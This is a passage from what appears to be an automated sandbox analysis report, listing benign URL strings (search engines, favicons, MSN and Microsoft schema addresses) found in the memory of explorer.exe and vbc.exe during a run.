Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000007.00000000.2113263958.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000007.00000000.2113263958.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000007.00000000.2107641557.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000007.00000000.2115039811.0000000004F30000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000007.00000000.2113263958.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000007.00000000.2120612541.000000000842E000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.icoz
Source: explorer.exe, 00000007.00000000.2120867977.000000000856E000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2114590389.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000007.00000000.2114590389.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000007.00000000.2113263958.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000007.00000000.2128384487.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000007.00000000.2107641557.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2114590389.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2113263958.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000007.00000000.2114590389.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000007.00000000.2120612541.000000000842E000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehps
Source: explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-de/?ocid=iehpXm
